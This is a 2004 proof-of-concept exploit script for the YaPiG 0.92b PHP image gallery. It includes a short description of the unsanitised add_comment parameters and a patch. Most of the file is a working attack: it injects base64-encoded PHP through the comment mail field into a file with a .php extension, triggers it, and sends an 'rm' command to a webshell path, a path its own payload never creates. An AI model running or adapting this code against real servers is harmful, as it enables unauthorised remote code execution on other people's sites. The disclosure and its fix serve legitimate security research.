yapig-php.txt

`#!/usr/bin/php   
  
  
<?   
  
  
/*   
  
  
YaPiG 0.92b add_coment PHP Insertion Proof of Concept   
By aCiDBiTS acidbitshotmail.com 07-August-2004   
  
  
  
Description:   
  
  
YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.   
This Proof of Concept creates a php file that echoes a notice.   
First it determines a valid photo directory where to create the script.   
Then creates a crafted comment saved in a new .php file. This comment   
contains an encoded webshell. Once this .php file is opened, the code   
contained creates test.php.   
  
  
Usage (in my debian box):   
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"   
  
  
  
Vulnerability:   
  
  
There is no user input sanization of some parameters in add_comment.php   
and functions.php.This allows to create a file with any extension, and we   
can   
insert any code in it. Version 0.92b is vulnerable, I haven't tested older   
ones.   
  
  
  
Workaround. Modify this lines of code:   
  
  
add_comment.php   
line 105:   
$comments_file= $gid_dir . $gid . "_" . $phid;   
Modify with:   
$comments_file= $gid_dir . $gid . "_" . intval($phid);   
  
  
functions.php, construct_comment_line()   
line 699-700:   
$linea=$linea . $data_array['mail'] . $SEPARATOR;   
$linea=$linea . $data_array['web'] . $SEPARATOR;   
Modify with:   
$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;   
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;   
  
  
*/   
  
  
  
echo "+-------------------------------------------------------+\n| YaPiG   
0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS   
acidbitshotmail.com 07-August-2004   
|\n+-------------------------------------------------------+\n\n";   
  
  
$websh="<?php   
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);   
?>";   
  
  
if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");   
$host=$argv[1];   
if(substr($host,strlen($host)-1,1)!='/') $host.='/';   
  
  
echo "[+] Getting valid gid & photo path ... ";   
$webc=get_web($host);   
$temp=explode(";gid=",$webc);   
$gid=intval($temp[1]);   
$temp=explode("photos/",$webc);   
$temp=explode("/",$temp[1]);   
$path=$temp[0];   
if( !$gid || !$path ) die( "Failed!\n\n");   
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";   
  
  
echo "[+] Creating notice script file ... ";   
send_post( $host."add_comment.php?gid=".$gid."&phid=.php",   
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");   
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );   
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm   
".$gid."_.php") );   
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";   
  
  
  
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\   
//||\\\\\n\n");   
  
  
  
function get_web($url)   
{   
$ch=curl_init();   
curl_setopt ($ch, CURLOPT_URL, $url);   
curl_setopt ($ch, CURLOPT_HEADER, 0);   
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);   
$data=curl_exec ($ch);   
curl_close ($ch);   
return $data;   
}   
  
  
function send_post($url,$data)   
{   
$ch=curl_init();   
curl_setopt ($ch, CURLOPT_URL, $url );   
curl_setopt ($ch, CURLOPT_HEADER, 0);   
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);   
curl_setopt ($ch, CURLOPT_POST, 1);   
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );   
$data=curl_exec ($ch);   
curl_close ($ch);   
return $data;   
}   
  
  
/* \ /   
(Oo)   
//||\\ */   
  
  
?>   
  
  
`